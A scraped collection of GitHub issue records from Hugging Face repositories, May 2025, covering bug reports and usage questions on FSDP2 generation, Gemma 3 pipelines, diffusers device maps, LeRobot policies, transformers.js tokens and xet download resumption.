    "repo": "huggingface/optimum",
    "number": 2275,
    "title": "ONNX export for ColPali",
    "body": "Hi Optimum,\n\nI have created a small tutorial how to export the ColPali late-interaction VLM in this [notebook](https://gist.github.com/kstavro/9bcdf930f0e69626dd5aa9aa5f09f867), but I think it shouldn't be too difficult to integrate it to Optimum as well.\n\nHowever, as far as I have seen, there is not much support for late-interaction VLMs at the moment. So, before I get into it just by myself, I thought I could first see if someone could give me a couple of hints about some choices regarding the library, eg what base configs I should use for ColPali or if I should create new ones everywhere, what names, do we need tiny dummy models for tests, etc.",
    "url": "https://github.com/huggingface/optimum/issues/2275",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-18T18:56:22Z",
    "updated_at": "2025-06-11T13:56:43Z",
    "comments": 2,
    "user": "kstavro"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38190,
    "title": "Gibberish generations with FSDP2 and MixedPrecisionPolicy",
    "body": "### System Info\n\n```\ntransformers.__version__='4.51.2'\ntorch.__version__='2.6.0+cu124'\nsys.version='3.10.17 (main, Apr 16 2025, 15:03:57) [GCC 12.1.1 20220628 (Red Hat 12.1.1-3)]'\n```\n\n### Who can help?\n\n@SunMarc @zach-huggingface\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nI'm sharding `llama-3.1-8b-instruct` on 8 GPUs using FSDP2. The goal is to be able to call `generate` during the training loop. I have noticed that If I use `MixedPrecisionPolicy` with `param_dtype=torch.bfloat16` the generations are gibberish. A hopefully reproducible example below.\n\n\n```python\nimport os\n\nimport torch\nimport torch.distributed as dist\nfrom torch.distributed._composable.fsdp import register_fsdp_forward_method\nfrom torch.distributed.device_mesh import init_device_mesh\nfrom torch.distributed.fsdp import (\n    MixedPrecisionPolicy,\n    fully_shard,\n)\nfrom transformers import AutoConfig, AutoModelForCausalLM, AutoTokenizer\nfrom transformers.models.llama.modeling_llama import LlamaDecoderLayer\n\n\n\ndef get_local_rank() -> int:\n    return int(os.environ.get(\"LOCAL_RANK\", \"0\"))\n\n\ndef get_global_rank() -> int:\n    return int(os.environ.get(\"RANK\", get_local_rank()))\n\n\ndef barrier():\n    dist.barrier(device_ids=[get_local_rank()])\n\n\ndef test_generate(model, tokenizer):\n    prompt = \"Concisely answer the following question: \"\n    queries = [\n        \"What is the tallest animal?\\n\",\n        \"What are 3 fruits larger in size than an apple?\\n\",\n        \"What's the derivative of e^x?\\n\",\n    ]\n\n    tokens = [tokenizer.encode(prompt + q) for q in queries]\n    max_len = max(len(t) for t in tokens)\n    padded = [[tokenizer.eos_token_id] * (max_len - len(t)) + t for t in tokens]\n    padded_t = torch.tensor(padded).long()\n\n    generations = model.generate(padded_t, max_new_tokens=128)\n    parsed = tokenizer.batch_decode(generations)\n    for p in parsed:\n        print(p, flush=True)\n\n\ndef main():\n    device = torch.device(\"cuda\", get_local_rank())\n    dist.init_process_group(\n        backend=\"nccl\",\n    )\n    torch.cuda.set_device(device)\n\n    LOCAL_MODEL_PATH = \"/llama-3.1-8b-instruct\"\n\n    tokenizer = AutoTokenizer.from_pretrained(LOCAL_MODEL_PATH)\n    model_config = AutoConfig.from_pretrained(LOCAL_MODEL_PATH)\n    model = AutoModelForCausalLM.from_pretrained(\n        LOCAL_MODEL_PATH,\n        config=model_config,\n        use_safetensors=True,\n        torch_dtype=torch.float32,\n    )\n\n    fsdp2_kwargs = {}\n    fsdp2_kwargs[\"mesh\"] = init_device_mesh(\n        \"cuda\", (torch.distributed.get_world_size(),)\n    )\n    fsdp2_kwargs[\"mp_policy\"] = MixedPrecisionPolicy(\n        param_dtype=torch.bfloat16,   # <<<----- If I comment this line the generations are as expected\n    )\n\n    for submodule in model.modules():\n        if isinstance(submodule, LlamaDecoderLayer):\n            fully_shard(submodule, **fsdp2_kwargs)\n    fully_shard(model, **fsdp2_kwargs)\n    register_fsdp_forward_method(model, \"generate\")\n\n    barrier()\n\n    test_generate(model, tokenizer)\n\n    barrier()\n\n    dist.destroy_process_group()\n\n\nif __name__ == \"__main__\":\n    main()\n```\n\nThe following  is an example of the output I get if `param_dtype=torch.bfloat16`:\n\n```\n<|eot_id|><|eot_id|><|eot_id|><|eot_id|><|eot_id|><|eot_id|><|begin_of_text|>Concisely answer the following question: What is the tallest animal?\nThe odense aalborg limburg fetisch odense fetisch<|start_header_id|>OO\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\n<|begin_of_text|>Concisely answer the following question: What are 3 fruits larger in size than an apple?\nHere fetisch<|start_header_id|>OOOOOOOOOO\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\u200d\n<|eot_id|><|eot_id|><|eot_id|><|begin_of_text|>Concisely answer the following question: What's the derivative of e^x?\nThe aalborg salopes<|start_header_id|>OOOOOOOOOOOOAAAAAAAA\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n\n### Expected behavior\n\nThe following is an example of the output I get if I comment out the `param_dtype=torch.bfloat16` in `MixedPrecisionPolicy`\n\n```\n<|eot_id|><|eot_id|><|eot_id|><|eot_id|><|eot_id|><|eot_id|><|begin_of_text|>Concisely answer the following question: What is the tallest animal?\nThe tallest animal is the giraffe, which can grow up to 18 feet (5.5 meters) tall.\nThe gi",
    "url": "https://github.com/huggingface/transformers/issues/38190",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-18T11:56:08Z",
    "updated_at": "2025-08-29T09:36:57Z",
    "comments": 17,
    "user": "dlvp"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38181,
    "title": "Add a way for `callbacks` to get `trainer` handler",
    "body": "When I want to implement differential privacy for the model, I customize the gradient clipping before `optimizer.step()`. The add custom noise to the model after `optimizer.step()`. I cannot get `Trainer.optimizer` in the `callback` function, it shows as `None`. Is it possible to get the reference of `Trainer` directly in `callback`?",
    "url": "https://github.com/huggingface/transformers/issues/38181",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-16T16:01:35Z",
    "updated_at": "2025-05-19T12:17:06Z",
    "comments": 1,
    "user": "MinzhiYoyo"
  },
  {
    "repo": "huggingface/open-r1",
    "number": 645,
    "title": "How to set vllm max-model-len?",
    "body": "I use qwen2.5-7b-Instruct to run grpo, and open yarn, to accommodate a longer window(greater than 32768). But fowllowing error exists:\n\n                                                                                                                                                                                      \n  0%|          | 0/187 [00:00                                                                                                                                                                      \n[rank2]:     main(script_args, training_args, model_args)                                                                                                                                                                                                                       \n[rank2]:   File \"/cto_studio/huyongquan/python_project/open-r1/src/open_r1/grpo.py\", line 309, in main                                                                                                                                                                          \n[rank2]:     train_result = trainer.train(resume_from_checkpoint=checkpoint)                                                                                                                                                                                                    ",
    "url": "https://github.com/huggingface/open-r1/issues/645",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-16T03:28:50Z",
    "updated_at": "2025-06-12T08:45:15Z",
    "user": "huyongquan"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38165,
    "title": "Gemma 3 Pipeline does not accept dictionary with no images",
    "body": "### System Info\n\nSystem info not really relevant as the bug is root caused in my description below.\n\n- `transformers` version: 4.51.3\n- Platform: Windows-10-10.0.26100-SP0\n- Python version: 3.11.9\n- Huggingface_hub version: 0.31.2\n- Safetensors version: 0.5.3\n- Accelerate version: 1.7.0\n- Accelerate config:    not found\n- DeepSpeed version: not installed\n- PyTorch version (GPU?): 2.4.0+cu121 (True)\n- Tensorflow version (GPU?): not installed (NA)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Using distributed or parallel set-up in script?: \n- Using GPU in script:Yes\n- GPU type: NVIDIA GeForce RTX 3090\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nThis issue can be created using the following snippet copied from Gemma 3 docs and up until transformer 4.51.3.\n```\nfrom transformers import pipeline\nimport torch\n\npipe = pipeline(\n    \"image-text-to-text\",\n    model=\"google/gemma-3-12b-it\",\n    device=\"cuda\", # Or \"cpu\" if you don't have a compatible GPU\n    torch_dtype=torch.bfloat16 # Or torch.float16 or torch.float32 based on your hardware/needs\n)\n\nmessages = [\n    {\n        \"role\": \"system\",\n        \"content\": [{\"type\": \"text\", \"text\": \"You are a helpful assistant.\"}]\n    },\n    {\n        \"role\": \"user\",\n        \"content\": [\n            # Removed the image link from the example\n            {\"type\": \"text\", \"text\": \"What is the capital of France?\"} # Keep only the text part\n        ]\n    }\n]\n\noutput = pipe(text=messages, max_new_tokens=200)\nprint(output[0][\"generated_text\"][-1][\"content\"])\n```\n\nwhich will result in the error:\n\n```\nTraceback (most recent call last):\n  File \"D:\\experiments\\personal\\gemma_editor\\gemma_editor.py\", line 78, in \n    run_gemma(SENTENCES)\n  File \"D:\\experiments\\personal\\gemma_editor\\gemma_editor.py\", line 41, in run_gemma\n    output = pipe(text=messages)\n             ^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\pipelines\\image_text_to_text.py\", line 311, in __call__\n    return super().__call__(Chat(text, images), **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\pipelines\\base.py\", line 1379, in __call__\n    return self.run_single(inputs, preprocess_params, forward_params, postprocess_params)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\pipelines\\base.py\", line 1385, in run_single\n    model_inputs = self.preprocess(inputs, **preprocess_params)\n                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\pipelines\\image_text_to_text.py\", line 365, in preprocess\n    model_inputs = self.processor(images=images, text=text, return_tensors=self.framework, **processing_kwargs).to(\n                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\models\\gemma3\\processing_gemma3.py\", line 106, in __call__\n    image_inputs = self.image_processor(batched_images, **output_kwargs[\"images_kwargs\"])\n                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\image_processing_utils.py\", line 42, in __call__\n    return self.preprocess(images, **kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\utils\\generic.py\", line 866, in wrapper\n    return func(*args, **valid_kwargs)\n           ^^^^^^^^^^^^^^^^^^^^^^^^^^^\n  File \"D:\\experiments\\personal\\gemma_editor\\venv\\Lib\\site-packages\\transformers\\models\\gemma3\\image_processing_gemma3.py\", line 361, in preprocess\n    if do_rescale and is_scaled_image(images[0]):\n                                      ~~~~~~^^^\nIndexError: list index out of range\n```\n\n### Expected behavior\n\nThe problem here is that within image_text_to_text, the dictionary is made into type: Chat. [By default chat makes images an empty list](https://github.com/huggingface/transformers/blame/v4.51.3/src/transformers/pipelines/image_text_to_text.py#L114). Then this is propagated to [images](https://github.com/huggingface/transformers/blame/v4.51.3/src/transformers/pipelines/image_text_to_text.py#L353C16-L353C39) where it ultimately lands in processing_gemma_3.py where the [if condition only checks if the images are None](https://github.com/huggingface/transformers/blob/v4.51.3/src/transformers/models/gemma3/",
    "url": "https://github.com/huggingface/transformers/issues/38165",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-16T01:34:15Z",
    "updated_at": "2025-06-23T08:03:03Z",
    "comments": 6,
    "user": "sheldonlai"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1114,
    "title": "How to collect data and train the policy from Lerobot totally out of the leader arm only by learning from demonstration using the main arm such as XARM or UR series",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/1114",
    "state": "closed",
    "labels": [
      "question",
      "robots",
      "stale"
    ],
    "created_at": "2025-05-15T15:31:13Z",
    "updated_at": "2025-12-31T02:35:25Z",
    "user": "David-Kingsman"
  },
  {
    "repo": "huggingface/transformers",
    "number": 38147,
    "title": "How to check the number of tokens processed or the load of each expert in the Qwen3 MoE model during inference?",
    "body": "",
    "url": "https://github.com/huggingface/transformers/issues/38147",
    "state": "closed",
    "labels": [],
    "created_at": "2025-05-15T09:21:29Z",
    "updated_at": "2025-05-15T13:36:53Z",
    "user": "wumaotegan"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11561,
    "title": "FluxFillPipeline Support load IP Adapter.",
    "body": "### Model/Pipeline/Scheduler description\n\n'FluxFillPipeline' object has no attribute 'load_ip_adapter'\nI really need this,Thanks!\n\n### Open source status\n\n- [ ] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11561",
    "state": "closed",
    "labels": [
      "help wanted",
      "Good second issue"
    ],
    "created_at": "2025-05-15T08:58:42Z",
    "updated_at": "2025-06-17T08:48:28Z",
    "comments": 6,
    "user": "PineREN"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1111,
    "title": "Unrecognized argument policy.path. How to load a pretrained model?",
    "body": "When I run this command:\n```\npython lerobot/scripts/control_robot.py --robot.type so100 --control.type record --control.fps 30 --control.single_task \"Grasp a yellow tape and put it to yellow square.\" --control.repo_id a_cam_1/result --control.tags '[\"tutorial\"]' --control.warmup_time_s 5 --control.episode_time_s 30 --control.reset_time_s 10 --control.m_episodes 1 --control.push_to_hub false --control.policy,path output/checkpoints/last/pretrained_model\n```\n\n\nI got:\n```\nusage: control_robot.py [-h] [--config_path str] [--robot str] [--robot.type {aloha,koch,koch_bimanual,moss,so101,so100,stretch,lekiwi}] [--robot.gripper_open_degree str]\n                        [--robot.max_relative_target str] [--robot.ip str] [--robot.port str] [--robot.video_port str] [--robot.cameras str] [--robot.calibration_dir str]\n                        [--robot.leader_arms str] [--robot.follower_arms str] [--robot.teleop_keys str] [--robot.mock str] [--control str]\n                        [--control.type {calibrate,teleoperate,record,replay,remote_robot}] [--control.arms str] [--control.teleop_time_s str] [--control.single_task str]\n                        [--policy str] [--control.policy.type {act,diffusion,pi0,tdmpc,vqbet,pi0fast}] [--control.policy.replace_final_stride_with_dilation str]\n                        [--control.policy.pre_norm str] [--control.policy.dim_model str] [--control.policy.n_heads str] [--control.policy.dim_feedforward str]\n                        [--control.policy.feedforward_activation str] [--control.policy.n_encoder_layers str] [--control.policy.n_decoder_layers str]\n                        [--control.policy.use_vae str] [--control.policy.n_vae_encoder_layers str] [--control.policy.temporal_ensemble_coeff str]\n                        [--control.policy.kl_weight str] [--control.policy.optimizer_lr_backbone str] [--control.policy.drop_n_last_frames str]\n                        [--control.policy.use_separate_rgb_encoder_per_camera str] [--control.policy.down_dims str] [--control.policy.kernel_size str]\n                        [--control.policy.n_groups str] [--control.policy.diffusion_step_embed_dim str] [--control.policy.use_film_scale_modulation str]\n                        [--control.policy.noise_scheduler_type str] [--control.policy.num_train_timesteps str] [--control.policy.beta_schedule str]\n                        [--control.policy.beta_start str] [--control.policy.beta_end str] [--control.policy.prediction_type str] [--control.policy.clip_sample str]\n                        [--control.policy.clip_sample_range str] [--control.policy.num_inference_steps str] [--control.policy.do_mask_loss_for_padding str]\n                        [--control.policy.scheduler_name str] [--control.policy.num_steps str] [--control.policy.attention_implementation str]\n                        [--control.policy.train_expert_only str] [--control.policy.train_state_proj str] [--control.policy.n_action_repeats str] [--control.policy.horizon str]\n                        [--control.policy.image_encoder_hidden_dim str] [--control.policy.state_encoder_hidden_dim str] [--control.policy.latent_dim str]\n                        [--control.policy.q_ensemble_size str] [--control.policy.mlp_dim str] [--control.policy.discount str] [--control.policy.use_mpc str]\n                        [--control.policy.cem_iterations str] [--control.policy.max_std str] [--control.policy.min_std str] [--control.policy.n_gaussian_samples str]\n                        [--control.policy.n_pi_samples str] [--control.policy.uncertainty_regularizer_coeff str] [--control.policy.n_elites str]\n                        [--control.policy.elite_weighting_temperature str] [--control.policy.gaussian_mean_momentum str] [--control.policy.max_random_shift_ratio str]\n                        [--control.policy.reward_coeff str] [--control.policy.expectile_weight str] [--control.policy.value_coeff str] [--control.policy.consistency_coeff str]\n                        [--control.policy.advantage_scaling str] [--control.policy.pi_coeff str] [--control.policy.temporal_decay_coeff str]\n                        [--control.policy.target_model_momentum str] [--control.policy.n_action_pred_token str] [--control.policy.action_chunk_size str]\n                        [--control.policy.vision_backbone str] [--control.policy.crop_shape str] [--control.policy.crop_is_random str]\n                        [--control.policy.pretrained_backbone_weights str] [--control.policy.use_group_norm str] [--control.policy.spatial_softmax_num_keypoints str]\n                        [--control.policy.n_vqvae_training_steps str] [--control.policy.vqvae_n_embed str] [--control.policy.vqvae_embedding_dim str]\n                        [--control.policy.vqvae_enc_hidden_dim str] [--control.policy.gpt_block_size str] [--control.policy.gpt_input_dim str]\n                        [--control.policy.gpt_output_dim str] [--control.policy.gpt_n_layer str] [--control.policy.gpt_n_head str] [--control.policy.gpt_hidden_dim str]\n ",
    "url": "https://github.com/huggingface/lerobot/issues/1111",
    "state": "closed",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-15T03:13:27Z",
    "updated_at": "2025-06-24T06:20:08Z",
    "user": "milong26"
  },
  {
    "repo": "huggingface/diffusers",
    "number": 11555,
    "title": "`device_map=\"auto\"` supported for diffusers pipelines?",
    "body": "### Describe the bug\n\nHey dear diffusers team,\n\nfor `DiffusionPipline`, as I understand (hopefully correctly) from [this part of the documentation](https://huggingface.co/docs/diffusers/v0.33.1/en/api/pipelines/overview#diffusers.DiffusionPipeline.from_pretrained.device_map), it should be possible to specify `device_map=\"auto\"` when loading a pipeline with `from_pretrained` but this results in a value error saying that this is not supported.\n\nHowever, the documentation on [device placement](https://huggingface.co/docs/diffusers/en/tutorials/inference_with_big_models#device-placement) currently states that only the \"balanced\" strategy is supported.\n\nIs this possibly similar to #11432 and should be removed from the docstrings / documentation? Happy to help on this with a PR if it turns out to be a mistake in the documentation.\n\nThanks a lot for your hard work!\n\n\n\n### Reproduction\n\n```python\nfrom diffusers import DiffusionPipeline\npipeline = DiffusionPipeline.from_pretrained(\"stable-diffusion-v1-5/stable-diffusion-v1-5\", device_map=\"auto\")\n```\n\nor \n\n```python\nfrom diffusers import StableDiffusionPipeline\npipe = StableDiffusionPipeline.from_pretrained(\"stable-diffusion-v1-5/stable-diffusion-v1-5\", device_map=\"auto\")\n```\n\n### Logs\n\n```shell\n---------------------------------------------------------------------------\nNotImplementedError                       Traceback (most recent call last)\nCell In[12], line 3\n      1 from diffusers import StableDiffusionPipeline\n----> 3 pipe = StableDiffusionPipeline.from_pretrained(\"stable-diffusion-v1-5/stable-diffusion-v1-5\", device_map=\"auto\")\n\nFile ~/miniconda3/envs/pruna/lib/python3.10/site-packages/huggingface_hub/utils/_validators.py:114, in validate_hf_hub_args.._inner_fn(*args, **kwargs)\n    111 if check_use_auth_token:\n    112     kwargs = smoothly_deprecate_use_auth_token(fn_name=fn.__name__, has_token=has_token, kwargs=kwargs)\n--> 114 return fn(*args, **kwargs)\n\nFile ~/miniconda3/envs/pruna/lib/python3.10/site-packages/diffusers/pipelines/pipeline_utils.py:745, in DiffusionPipeline.from_pretrained(cls, pretrained_model_name_or_path, **kwargs)\n    742     raise ValueError(\"`device_map` must be a string.\")\n    744 if device_map is not None and device_map not in SUPPORTED_DEVICE_MAP:\n--> 745     raise NotImplementedError(\n    746         f\"{device_map} not supported. Supported strategies are: {', '.join(SUPPORTED_DEVICE_MAP)}\"\n    747     )\n    749 if device_map is not None and device_map in SUPPORTED_DEVICE_MAP:\n    750     if is_accelerate_version(\"<\", \"0.28.0\"):\n\nNotImplementedError: auto not supported. Supported strategies are: balanced\n```\n\n### System Info\n\n- \ud83e\udd17 Diffusers version: 0.33.1\n- Platform: Linux-5.15.0-139-generic-x86_64-with-glibc2.35\n- Running on Google Colab?: No\n- Python version: 3.10.16\n- PyTorch version (GPU?): 2.7.0+cu126 (True)\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\n- Jax version: not installed\n- JaxLib version: not installed\n- Huggingface_hub version: 0.30.2\n- Transformers version: 4.51.3\n- Accelerate version: 1.6.0\n- PEFT version: 0.15.2\n- Bitsandbytes version: 0.45.5\n- Safetensors version: 0.5.3\n- xFormers version: not installed\n- Accelerator: NVIDIA H100 PCIe, 81559 MiB\nNVIDIA H100 PCIe, 81559 MiB\n- Using GPU in script?: yes\n- Using distributed or parallel set-up in script?: yes\n\n### Who can help?\n\n_No response_",
    "url": "https://github.com/huggingface/diffusers/issues/11555",
    "state": "open",
    "labels": [
      "bug"
    ],
    "created_at": "2025-05-14T16:49:32Z",
    "updated_at": "2025-05-19T09:44:29Z",
    "comments": 4,
    "user": "johannaSommer"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1107,
    "title": "Does Pi0 use PaliGemma VLM pretrained model weights?",
    "body": "I attempted to finetune the Pi0 model, but noticed that it does not download the pretrained weights of Paligemma from Hugging Face. Specifically, I found that Pi0 initializes the VLM with:\n\n```python\nself.paligemma = PaliGemmaForConditionalGeneration(config=config.paligemma_config)\n```\n\ninstead of using:\n\n```python\nAutoModel.from_pretrained(\"google/paligemma-3b-pt-224\")\n```\n\nThis seems to result in the model not loading the pretrained weights.\n\nCould you please confirm whether this is the intended behavior? Should Pi0 load Paligemma\u2019s pretrained weights from Hugging Face, or is there a reason it initializes the model from scratch?\n\nThank you!",
    "url": "https://github.com/huggingface/lerobot/issues/1107",
    "state": "closed",
    "labels": [
      "bug",
      "question",
      "policies"
    ],
    "created_at": "2025-05-14T06:47:15Z",
    "updated_at": "2025-10-08T08:44:03Z",
    "user": "lxysl"
  },
  {
    "repo": "huggingface/lerobot",
    "number": 1106,
    "title": "How to convert image mode to video mode lerobot dataset?",
    "body": "",
    "url": "https://github.com/huggingface/lerobot/issues/1106",
    "state": "open",
    "labels": [
      "question",
      "dataset"
    ],
    "created_at": "2025-05-14T03:54:42Z",
    "updated_at": "2025-08-08T16:42:33Z",
    "user": "hairuoliu1"
  },
  {
    "repo": "huggingface/transformers.js",
    "number": 1316,
    "title": "May I ask how to set the HF_TOKEN on the browser side?",
    "body": "### Question\n\nMay I ask how to set the HF_TOKEN on the browser side?\n\n![Image](https://github.com/user-attachments/assets/944af6e1-a3b7-429b-81a6-6d205925915e)\n\nThe following is my code:\n```\nconst model = await AutoModel.from_pretrained(\"briaai/RMBG-2.0\", {\n  config: {\n    model_type: \"custom\", \n  },\n  headers: {\n    'Authorization': `Bearer hf_xxxxxxxxxxxxxxx`\n  }\n});\n```",
    "url": "https://github.com/huggingface/transformers.js/issues/1316",
    "state": "open",
    "labels": [
      "question"
    ],
    "created_at": "2025-05-14T01:43:02Z",
    "updated_at": "2025-05-27T21:53:45Z",
    "user": "dengbupapapa"
  },
  {
    "repo": "huggingface/xet-core",
    "number": 321,
    "title": "How to resume DL of partial existing file using xet + huggingface-cli download if not previously downloaded using HF tools / cache?",
    "body": "How to resume DL of partial existing file using xet + huggingface-cli download if not previously downloaded using HF tools / cache?\n\nI guess there may be a way in the scenario I had but by my mistake apparently I chose some incorrect usage and caused the deletion of the 95% complete partial local file instead of resuming / recovering its download via XET.\n\ne.g. I tried with a fresh tool install and a process something like:\n\n% pip install -U \"huggingface_hub[hf_xet]\"\n\n% pwd\n/whatever/some_tmpdir\n\n% ls -lh somefile\n35G somefile\n// Partial file exists and is 95% complete but short / truncated by failed copy previously.\n\n% huggingface-cli download --local-dir . some_repo_id some_dir/somefile\n\nThe end result was apparently the deletion of the pre-existing 95% complete 'somefile' from the current directory and the initiation of new download using xet protocol from the xet enabled some_repo_id.\n\nBased on huggingface-cli download --help and the articles about xet I had expected it to realize the pre-existing current directory's \"somefile\" with an identical name/target directory as the file being requested for download was a partial relevant file and it should start to recover / complete the download by missing chunk completion.  That despite the fact that there was no cache directory or git LFS structure around the current working directory, it just contained the isolated partial file only.\n\n\nhuggingface-cli download --help \nusage: huggingface-cli  [] download [-h] [--repo-type {model,dataset,space}] [--revision REVISION] [--include [INCLUDE ...]] [--exclude [EXCLUDE ...]] [--cache-dir CACHE_DIR]\n                                                   [--local-dir LOCAL_DIR] [--local-dir-use-symlinks {auto,True,False}] [--force-download] [--resume-download] [--token TOKEN] [--quiet]\n                                                   [--max-workers MAX_WORKERS]\n                                                   repo_id [filenames ...]\n\npositional arguments:\n  repo_id               ID of the repo to download from (e.g. `username/repo-name`).\n  filenames             Files to download (e.g. `config.json`, `data/metadata.jsonl`).\n\noptions:\n...\n  --local-dir LOCAL_DIR\n                        If set, the downloaded file will be placed under this directory. Check out https://huggingface.co/docs/huggingface_hub/guides/download#download-files-to-local-folder for more\n                        details.\n...\n  --resume-download     Deprecated and ignored. Downloading a file to local dir always attempts to resume previously interrupted downloads (unless hf-transfer is enabled).\n...\n\nhuggingface-cli download --local-dir . some_repo_id some_dir/somefile\nDownloading 'somefile' to '.cache/huggingface/download/whatever.incomplete'\nXet Storage is enabled for this repo. Downloading file from Xet Storage..\n...\n\n\nIf there's a different way to accomplish this partial file recovery result (or even if there's a corrupted / patched / whatever file per. xet's chunk filling capabilities) then perhaps clarifying / expanding the usage documentation to cover this kind of common scenario use case could help?\n\nThe desired result would be something like\n\nrsync --verbose --archive server:/some_repo_id/somedir/somefile somefile\n\nwhich would use rolling hash chunk based 